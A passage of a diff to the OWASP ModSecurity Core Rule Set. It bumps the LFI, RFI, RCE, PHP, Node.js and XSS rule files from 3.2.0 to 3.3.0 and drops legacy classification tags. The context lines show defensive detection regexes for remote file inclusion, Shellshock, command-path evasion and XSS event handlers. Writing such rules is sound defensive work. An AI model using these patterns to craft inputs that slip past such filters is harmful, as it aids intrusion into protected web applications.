setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ @@ -89,11 +87,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-lfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/FILE_INJECTION',\ - tag:'WASCTC/WASC-33',\ - tag:'OWASP_TOP_10/A4',\ tag:'PCI/6.5.4',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -118,11 +113,8 @@ SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \ tag:'attack-lfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/FILE_INJECTION',\ - tag:'WASCTC/WASC-33',\ - tag:'OWASP_TOP_10/A4',\ tag:'PCI/6.5.4',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf index 3eaa54bc2..cc163b516 100644 --- a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf +++ b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -47,9 +47,8 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1 tag:'attack-rfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/RFI',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -68,9 +67,8 @@ SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_abso tag:'attack-rfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/RFI',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -89,9 +87,8 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ tag:'attack-rfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/RFI',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -117,10 +114,9 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \ tag:'platform-multi',\ tag:'attack-rfi',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/RFI',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ chain" diff --git a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf index fbb31b7b8..64566f49c 100644 --- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf +++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -113,12 +113,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -151,12 +148,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -250,12 +244,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -291,12 +282,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -328,12 +316,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -367,12 +352,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -415,12 +397,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -468,12 +447,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -507,12 +483,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -541,12 +514,9 @@ SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -565,12 +535,9 @@ SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -603,11 +570,8 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -658,13 +622,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-unix',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -692,13 +653,10 @@ SecRule ARGS "@rx (?:/|\\\\)(?:[\?\*]+[a-z/\\\\]+|[a-z/\\\\]+[\?\*]+)" \ tag:'platform-unix',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf index 2c4233574..a84e9bebe 100644 --- a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf +++ b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -57,10 +57,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -100,10 +98,8 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -126,10 +122,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@pm =" \ @@ -155,10 +149,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -193,10 +185,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -223,10 +213,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -292,10 +280,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -347,10 +333,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -404,10 +388,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -461,10 +443,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -504,10 +484,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -548,11 +526,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@pm (" \ @@ -603,11 +579,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -650,11 +624,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -694,11 +666,9 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -725,11 +695,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf b/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf index 0aef3a9fa..30ecd79bd 100644 --- a/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf +++ b/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -59,10 +59,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-rce',\ tag:'attack-injection-nodejs',\ tag:'paranoia-level/1',\ - tag:'OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION',\ - tag:'OWASP_TOP_10/A1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ diff --git a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf index b904328e2..dab8f0ea0 100644 --- a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf +++ b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -47,14 +47,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -79,14 +73,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -96,7 +84,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F # -=[ XSS Filters - Category 2 ]=- # XSS vectors making use of event handlers like onerror, onload etc, e.g., # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]+on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \ +SecRule 